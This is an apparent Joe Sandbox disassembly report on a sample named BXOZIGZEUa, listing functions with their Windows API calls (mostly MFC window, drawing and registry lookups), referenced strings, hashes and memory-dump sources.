Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: 5f9331c1f84b63c54e89958ce3b5e01c9faaef8d0da93c19868c299dda92d86d
Instruction ID: d4cc074332e9eaad583bb485bd2bae3ef00731770785f7eb2459c8f848c42dc2
Opcode Fuzzy Hash: 5f9331c1f84b63c54e89958ce3b5e01c9faaef8d0da93c19868c299dda92d86d
Instruction Fuzzy Hash: B8F0F432645218BFCB10EB689C06EBE3BA8EB06720F500705F522E61C0CEA8A9459795

Function 0052F478 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000002), ref: 0052F49F
GetFocus.USER32 ref: 0052F4AB
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0052F4DC

Strings

y, xrefs: 0052F489

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: FocusKillRedrawTimerWindow
String ID: y
API String ID: 1950525498-4225443349
Opcode ID: c68334409cad7d3ef82f4a40a13d64d8803d9d696d4a37e5d067ed314fc60a8c
Instruction ID: d545c1b751f8389964d31d3fec3fe66443abe70bc858f7f7719e6d3a61b60c96
Opcode Fuzzy Hash: c68334409cad7d3ef82f4a40a13d64d8803d9d696d4a37e5d067ed314fc60a8c
Instruction Fuzzy Hash: 49F06D32610224ABDF347B61F808B6B3B75BF26715F20843AE516850E1DAF59840DB81

Function 004E183D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E184F
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 004E185F

Strings

Advapi32.dll, xrefs: 004E184A
RegCreateKeyTransactedW, xrefs: 004E1859

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1646373207-2994018265
Opcode ID: f6b69d3e7eda1e242989b5e40beed6af441bb760e6bf2f993d7fe4b6f4aba81e
Instruction ID: 66f10855809299a24e481936d0c44e3cf01b526e14bc7c8b02d4cd6da059086d
Opcode Fuzzy Hash: f6b69d3e7eda1e242989b5e40beed6af441bb760e6bf2f993d7fe4b6f4aba81e
Instruction Fuzzy Hash: 51F01932180249FBCF122F919C04EFA3BA9FB08752F054426FA1991070D77AC460EB55

Function 004E17E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E17F6
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 004E1806

Strings

RegOpenKeyTransactedW, xrefs: 004E1800
Advapi32.dll, xrefs: 004E17F1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 1646373207-3913318428
Opcode ID: 8c265c12c4c76a895590b879126ff9eef0b16e2daae73aa0ac77ded1b287dde7
Instruction ID: 717da5e914de9fd1b3b0f91c0e4a49709a83a7fcd0485c0aa826dabab9951348
Opcode Fuzzy Hash: 8c265c12c4c76a895590b879126ff9eef0b16e2daae73aa0ac77ded1b287dde7
Instruction Fuzzy Hash: BDF0307228024AEBCF212F919C08FB63BA9FB14752F084426F55591170DB7984A4EB95

Function 005149B6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005149C8
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 005149D8

Strings

GetFileAttributesTransactedW, xrefs: 005149D2
kernel32.dll, xrefs: 005149C3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetFileAttributesTransactedW$kernel32.dll
API String ID: 1646373207-1378992308
Opcode ID: 4b4ccd479c750982ec0da5458d01b19104cf863375707db6e834ebef0aebd6de
Instruction ID: da32f69cc21bda6daf9c34fd835b636ac87290e2789fde06fa36eb3260fb57bf
Opcode Fuzzy Hash: 4b4ccd479c750982ec0da5458d01b19104cf863375707db6e834ebef0aebd6de
Instruction Fuzzy Hash: 3FF03032240206EBEF251F959C08BF67F99FF04B51F04552AF515C1060DE79C8D0EE90

Function 005286AD Relevance: 6.5, APIs: 4, Instructions: 476COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005286B4
GetWindowRect.USER32(?,?), ref: 005288AC
GetParent.USER32(?), ref: 00528930
GetParent.USER32(?), ref: 00528C24

Part of subcall function 0052DF57: GetParent.USER32(?), ref: 0052DF88

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Parent$H_prolog3_RectWindow
String ID:
API String ID: 3969657074-0
Opcode ID: bac9b138ac2f9bd968af5f1dca57923b475c02924f818bf3703684d5a0f7cb8b
Instruction ID: 2210f46ed875be1a82666d44be9709313d1672c2e9a91b42537b3cb766b5fe99
Opcode Fuzzy Hash: bac9b138ac2f9bd968af5f1dca57923b475c02924f818bf3703684d5a0f7cb8b
Instruction Fuzzy Hash: A8124470A01209AFCF05EFE9D899ABDBBB6BF48315F14012EF416A7291DF385A01CB51

Function 0055389A Relevance: 6.4, APIs: 4, Instructions: 435COMMON

Download Yara Rule

APIs

Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A

Part of subcall function 00551251: SetRectEmpty.USER32(?), ref: 0055125E
Part of subcall function 00551251: GetWindowRect.USER32(?,?), ref: 0055126F

IsRectEmpty.USER32(?), ref: 005538FB
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0055398C
GetWindowRect.USER32(?,?), ref: 00553C2B
EqualRect.USER32(?,?), ref: 00553C44

Part of subcall function 0055164A: GetWindowRect.USER32(?,?), ref: 00551681
Part of subcall function 0055164A: OffsetRect.USER32(?,00000000,?), ref: 005516AB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$ClientEmptyScreen$EqualOffsetRedraw
String ID:
API String ID: 1200911113-0
Opcode ID: 6c1486697c8f435a5f96849714fc918ed04bd6d6ef04e4ffa6af5f3149812fd8
Instruction ID: fd872ea54eba0d9cf4b56de7e6cc77cb3031c040be441ee28ac64de5d4e96458
Opcode Fuzzy Hash: 6c1486697c8f435a5f96849714fc918ed04bd6d6ef04e4ffa6af5f3149812fd8
Instruction Fuzzy Hash: 5DF15F71A00209DFCF24DFA9C8A8AADBFB5FF84791F14401BE805AB251DB709E49CB50

Function 0050AB35 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050AB78
CopyRect.USER32(?,?), ref: 0050AB83
GetClientRect.USER32(?,?), ref: 0050AB9C
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0050AD32

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientCopyInfoParametersSystemWindow
String ID:
API String ID: 1264264222-0
Opcode ID: 68934a4074d3cd97f40d344c8a8971572eac6ee9586a2e2471deda52e8bddf72
Instruction ID: e90ae77fa301bf2b6cbbc01301474a186f964a524ee5d5f2de242cd3c7feb583
Opcode Fuzzy Hash: 68934a4074d3cd97f40d344c8a8971572eac6ee9586a2e2471deda52e8bddf72
Instruction Fuzzy Hash: ED813C71D00619EFCF14DFA8C9889AEBBB5FF48701F11856AE806AB244DB34AD45CF91

Function 0054EC04 Relevance: 6.2, APIs: 4, Instructions: 187windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 0054ECAF
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0054ECC9
GetObjectW.GDI32(?,00000018,?), ref: 0054EDD2

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

InvalidateRect.USER32(?,00000000,00000001,?,00000000,?,?,?), ref: 0054EE65

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CompatibleCreate$BitmapException@8H_prolog3InvalidateObjectRectThrow
String ID:
API String ID: 103296630-0
Opcode ID: 451bd5e71a9435da8fe3b8dd94f7a582af79e42dc60183c732f29e906ef3fd39
Instruction ID: 9b57fa6c8f4bef28d9b4d12c62f291ab67a489e4df6c6b847818a5672193df5d
Opcode Fuzzy Hash: 451bd5e71a9435da8fe3b8dd94f7a582af79e42dc60183c732f29e906ef3fd39
Instruction Fuzzy Hash: 1E718271900599AFCB25DB61CC55EEEBBB9FF44308F10449DE906A3281DBB46E84CF64

Function 00531548 Relevance: 6.2, APIs: 4, Instructions: 177COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0053159F
SetRectEmpty.USER32(?), ref: 005315F8
OffsetRect.USER32(?,00000000,?), ref: 0053169F
SetRectEmpty.USER32(?), ref: 005316F5

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$ClientOffset
String ID:
API String ID: 2342594873-0
Opcode ID: 64a6f9e07721aaf9ac2563e72a5d1fa66480e729e83e784c0cf3a16580514591
Instruction ID: e8c8cb1a6f269914c93104c5c78d5ed7ffe0da59ce3fae0a14a04accaa0230dc
Opcode Fuzzy Hash: 64a6f9e07721aaf9ac2563e72a5d1fa66480e729e83e784c0cf3a16580514591
Instruction Fuzzy Hash: A361F571A0061A9FCF11DFB8C9849EEBBF6BF49300F15456AE815EB240DB71A905CF60

Function 005320C2 Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00532196
IsRectEmpty.USER32(?), ref: 005321AF
GetClientRect.USER32(?,?), ref: 005321C7
SetRectEmpty.USER32(?), ref: 005321DD

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Part of subcall function 004FE373: CharUpperW.USER32(?,00000026,00000000), ref: 004FE3EB

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$CharClientException@8H_prolog3ThrowUpper
String ID:
API String ID: 1382499863-0
Opcode ID: 1b2b8b3ec5db01527d8f323174d8c276f412cb44495f789683cd36685403b521
Instruction ID: 94610383a374719e7e1abfe42b4cff0e865a8f71913f974501946f45e492426d
Opcode Fuzzy Hash: 1b2b8b3ec5db01527d8f323174d8c276f412cb44495f789683cd36685403b521
Instruction Fuzzy Hash: D6615A71A0060A9FCB00DFE9C984AEEBBF5BF48314F14456EE515E7291CB34A941CF54

Function 0051C23C Relevance: 6.2, APIs: 4, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0051C2D8
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0051C31E
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0051C32E
IsWindowVisible.USER32(?), ref: 0051C3D3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$RedrawVisible
String ID:
API String ID: 2376333906-0
Opcode ID: 547d97a890ca0024d69b92de7e8c6c5222c8660cb910377b8c084a3f8cc6e6cc
Instruction ID: 494a7daff8f15066dcb466a518067d06ef45a782018a34743f6d21d5c3060f36
Opcode Fuzzy Hash: 547d97a890ca0024d69b92de7e8c6c5222c8660cb910377b8c084a3f8cc6e6cc
Instruction Fuzzy Hash: E751B531240600EFD7219F65C889EBA7FB6FF84B00B24496DF5568B651DB36ED80DB50

Function 00551406 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0055147B
GetWindowRect.USER32(?,?), ref: 005514D8
IsRectEmpty.USER32(?), ref: 005514E7
OffsetRect.USER32(?,00000000,?), ref: 0055155F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$OffsetWindow
String ID:
API String ID: 3444667153-0
Opcode ID: 38de5a56d5e8b9daa37df3e4fe195e61a33915f368f25dea5f7a6cefbf9fc783
Instruction ID: 7d96df58d25564087ff040ce5b1c0695dc3a2640d594a0cc272ef54833719de7
Opcode Fuzzy Hash: 38de5a56d5e8b9daa37df3e4fe195e61a33915f368f25dea5f7a6cefbf9fc783
Instruction Fuzzy Hash: 99510571D0061ADFCF20DFA8C894AEEBFB5BB48712F14452AE916A7200D770AE44CF95

Function 0058539D Relevance: 6.2, APIs: 4, Instructions: 157COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 005853CF
SetRectEmpty.USER32(?), ref: 00585461
SetRect.USER32(?,0000000A,?,?), ref: 00585498
CopyRect.USER32(?,?), ref: 005854D1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CopyEmptyWindow
String ID:
API String ID: 2176940440-0
Opcode ID: a4d4ac5cf1fb1dd0569a5a947cf469e7c4191499e1431b1f1e09036ad5f9cfb6
Instruction ID: 263ab95285baa6be26154bf043cf7545a68a4073cd95823cc48b459506ee7c85
Opcode Fuzzy Hash: a4d4ac5cf1fb1dd0569a5a947cf469e7c4191499e1431b1f1e09036ad5f9cfb6
Instruction Fuzzy Hash: 5F51C5B5D01619AFCF10EFA9D9848EEFBB9FB88700B24451AE805B7210D7746E45CFA1

Function 00514BBE Relevance: 6.2, APIs: 4, Instructions: 155timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00514BE1
GetFileTime.KERNEL32(?,?,?,?), ref: 00514C1F
GetFileSizeEx.KERNEL32(?,?), ref: 00514C37

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: cb46187054a4dacbbcf5cb6337e7393ff2a95a2fd2d39118922b08a9c6584742
Instruction ID: d399c0bebaa7ee93f01b204f5af22dee016842ae07d554630f692efb258727ba
Opcode Fuzzy Hash: cb46187054a4dacbbcf5cb6337e7393ff2a95a2fd2d39118922b08a9c6584742
Instruction Fuzzy Hash: 99514EB1900605EFDB20DFA5D995CAABBF8FF083147148A2EE166D7690E730E944CF94

Function 005AF7AE Relevance: 6.2, APIs: 4, Instructions: 155windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005AF7B5
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 005AF91C
SendMessageW.USER32(?,00000150,?,00000000), ref: 005AF968
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 005AF99A

Part of subcall function 004DB128: __EH_prolog3_GS.LIBCMT ref: 004DB132

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$H_prolog3H_prolog3_
String ID:
API String ID: 1270747201-0
Opcode ID: c185168c6e1773ecd48ad1a48cc9a69f8de475eb865bbaeecc0584aeff4479b4
Instruction ID: 9bdde3b7cc7da322992e823b8627839d3472f50592fbe8bb00e705abcdcf735a
Opcode Fuzzy Hash: c185168c6e1773ecd48ad1a48cc9a69f8de475eb865bbaeecc0584aeff4479b4
Instruction Fuzzy Hash: 3B515C31200B059FDB11EF75C895FAEBBE5BF44304F00482EB59BA72A2DB74AA45CB54

Function 0054F07D Relevance: 6.2, APIs: 4, Instructions: 151windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 0054F119
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0054F133

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Part of subcall function 004E066D: SelectObject.GDI32(?,?), ref: 004E0678

FillRect.USER32(?,00000000,?), ref: 0054F191
GetObjectW.GDI32(?,00000018,?), ref: 0054F1C6

Part of subcall function 005B646F: __EH_prolog3.LIBCMT ref: 005B6476
Part of subcall function 005B646F: GetObjectW.GDI32(00000005,00000018,?), ref: 005B6564

Part of subcall function 0053F436: __EH_prolog3_catch.LIBCMT ref: 0053F43D
